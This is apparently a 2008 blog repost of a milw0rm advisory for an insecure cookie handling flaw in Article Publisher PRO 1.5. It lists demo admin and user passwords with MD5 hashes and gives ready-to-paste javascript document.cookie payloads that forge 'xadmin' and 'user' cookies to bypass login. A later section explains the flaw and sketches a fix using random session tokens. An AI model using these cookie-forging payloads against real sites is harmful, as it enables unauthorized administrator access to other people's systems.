"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Sunday, 2 November 2008

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6929

Discovered By: ZoRLu

demo admin login:

http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php

demo user login:

http://demo-article-publisher-pro.phparticlescript.com/login.php


admin_name: admin

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 1

or

user_name: zorlu

passwd: zorlu

passwd_md5: 2178fb3ee4a88f946ecb68734b266c10

user_id: 6

or

user_name: demo

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 2


exploit:

admin:

javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";

user:

javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";

for demo admin: ( user_id: 1)

javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

for demo user: ( for user zorlu user_id: 6 )

javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";

for demo user: ( for user demo user_id: 2 )

javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
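
The cookie values above are just `user_id,md5(password)` (`%2C` is an encoded comma), so the credential is static, cannot be revoked short of a password change, and is reproducible by anyone who learns the stored hash. The sketch below is an added example, not code from Article Publisher PRO or from the advisory: it contrasts an assumed server-side check of that shape with a random, server-issued session token. The account table, function names and cookie name `session` are hypothetical.

```python
import hashlib
import hmac
import secrets
from urllib.parse import unquote

# Constructed account table (not the application's data): user_id -> unsalted MD5 hex.
USERS = {7: hashlib.md5(b"constructed-password").hexdigest()}

def weak_check(cookie_value):
    """Assumed shape of the flawed check: trust 'user_id,md5(password)' sent by the client."""
    user_id, _, digest = unquote(cookie_value).partition(",")
    if not user_id.isdigit():
        return None
    stored = USERS.get(int(user_id))
    # The cookie is valid whenever it matches the database row, so it never expires.
    return int(user_id) if stored is not None and stored == digest else None

# Hardened variant: the cookie carries only an unguessable token; the user_id stays server-side.
SESSIONS = {}  # token -> user_id

def login(user_id, password):
    """Verify the password once, then issue a random session token."""
    # MD5 is kept only to match the constructed table; a real fix also migrates to a
    # salted, slow password hash.
    digest = hashlib.md5(password.encode()).hexdigest()
    stored = USERS.get(user_id)
    if stored is None or not hmac.compare_digest(stored, digest):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token

def session_check(cookie_value):
    """Accept only tokens this server issued; anything derived from the hash fails."""
    return SESSIONS.get(cookie_value)

def logout(token):
    """Server-side revocation, which the hash-based cookie cannot offer."""
    SESSIONS.pop(token, None)

def set_cookie_header(token):
    # HttpOnly keeps the token away from script; Secure restricts it to HTTPS.
    return f"Set-Cookie: session={token}; Path=/; HttpOnly; Secure; SameSite=Lax"
```
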

